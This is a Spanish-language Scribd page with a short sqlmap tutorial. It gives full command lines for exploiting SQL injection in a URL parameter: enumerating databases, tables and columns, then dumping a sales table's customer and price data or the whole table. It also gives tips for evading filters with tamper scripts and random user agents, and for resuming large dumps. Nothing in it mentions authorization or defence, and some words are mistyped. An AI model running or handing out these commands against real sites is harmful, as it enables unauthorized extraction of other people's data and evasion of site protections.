0% encontró este documento útil (0 votos)
0 vistas9 páginas

Comandos Básicos

El documento proporciona una guía sobre el uso de sqlmap para la enumeración de bases de datos y tablas a través de comandos específicos. Incluye ejemplos de comandos para agregar URLs, enumerar bases de datos y tablas, así como opciones para volcar datos. También se mencionan sugerencias de carga útil y comandos opcionales para mejorar la precisión de la enumeración.

Cargado por

medgard2222
Derechos de autor
© All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
0 vistas9 páginas

Comandos Básicos

El documento proporciona una guía sobre el uso de sqlmap para la enumeración de bases de datos y tablas a través de comandos específicos. Incluye ejemplos de comandos para agregar URLs, enumerar bases de datos y tablas, así como opciones para volcar datos. También se mencionan sugerencias de carga útil y comandos opcionales para mejorar la precisión de la enumeración.

Cargado por

medgard2222
Derechos de autor
© All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

comandos básicos

-u para agregar la URL

--dbs para la enumeración de la base de datos

--batch para automatizar las opciones

cmd: python [Link] -u “[Link]/[Link]?id=1” --dbs --batch

opcional --threads que van del 1 al 10

cmd: python [Link] -u “[Link]/[Link]?id=1” --dbs --batch --threads


La enumeración finalizada de las bases de datos a veces encuentra muchas de ellas,
simplemente elija una que no sea del sistema, por ejemplo, information_schema master,
sys, ...

opas una enumeración de la base de datos c (--dbs)

Seleccionamos la base de datos y enumeramos las tablas con el comando --tables

cmd: python [Link] -u "[Link] -D public --


tables --batch --threads 10

Aquí seleccioné la base de datos pública y enumeré las tablas usando --tables.
Devolverá una lista de tablas.

Elegimos una y, opcionalmente, si queremos contar las filas de cada tabla, usamos --
count.
python [Link] -u "[Link] -D public --tables -
-batch --threads 10 --count

Las sugerencias de carga útil son útiles cuando falla la enumeración. Algunos ejemplos de
las más comunes son: `--tamper=space2comment` o `--random-agent`.

Estas sugerencias suelen añadirse a la URL cuando falla la enumeración. En este caso, es
fundamental aprender las sugerencias `--hex` o `--no-cast`.
recuento de líneas completado

Ahora enumeramos las columnas, elegimos una tabla o volcamos todo, lo cual no se
recomienda ya que volcará toda la base de datos.

Seleccione la tabla para numerar las columnas utilizando el comando --columns.

cmd: python [Link] -u "[Link] -D public -T


ventas_es --columns --batch --threads 10
Seleccione las columnas deseadas o vacíe la tabla completa.

El comando `-C` en lugar de `--columns` indica que está seleccionando columnas


separadas por comas, y `--dump` significa que desea volcar estas columnas separadas
por comas.

cmd: python [Link] -u "[Link] -D public -T


ventas_es -C cliente,precio --dump --batch --threads 10

Para volcar la tabla completa, simplemente omita el comando -C

cmd: python [Link] -u "[Link] -D public -T


ventas_es --dump --batch --threads 10

Abvora simplemente finaliza el volcado y busca en la carpeta predeterminada o usa el


comando --output-dir="ruta a tu carpeta"
Supongamos que finaliza su volcado

Tenga en cuenta que durante las enumeraciones, se modifican los comandos y se insertan
los valores que enumeran:

--dbs -> -D dbName

--tables -> -T tbName

--columns -> -C column1,column2

Se pueden insertar comandos opcionales al final del comando:

--output-dir="ruta a la carpeta" Este comando redirige la salida de datos a una ubicación


distinta a la predeterminada indicada al final del script sqlmap.

Se sugieren varias cargas útiles:

--hex

--no-cast

--pivoting

--risk --level

--technique=BU ....
Se sugieren varios comandos; esto depende de la precisión de los datos, ya que pueden
alterar significativamente el tiempo de enumeración.

Recomiendo usar solo --tamper=space2comment

--random-agemt

o algún otro personalizado.

También existe la opción --start=, que se utiliza cuando se detiene en un punto específico
y se desea comenzar desde allí. Por ejemplo: --start=10000

Comienza a volcar desde 10 000.

cmd: python [Link] -u "[Link] -D public -T


ventas_es --dump --batch --threads 10 --start=10000

Hay muchos otros; si desea profundizar, lea la documentación. `sqlmap` es una utilidad y `--
where` acepta comandos SQL y puede usarse para filtrar sus datos.
by: paulo takaracha nomuro

telegram: @ptkalcapone

coder PHP, NODE, JS,PYTHON,DART/Flutter

backend/frotend mobile(android)

También podría gustarte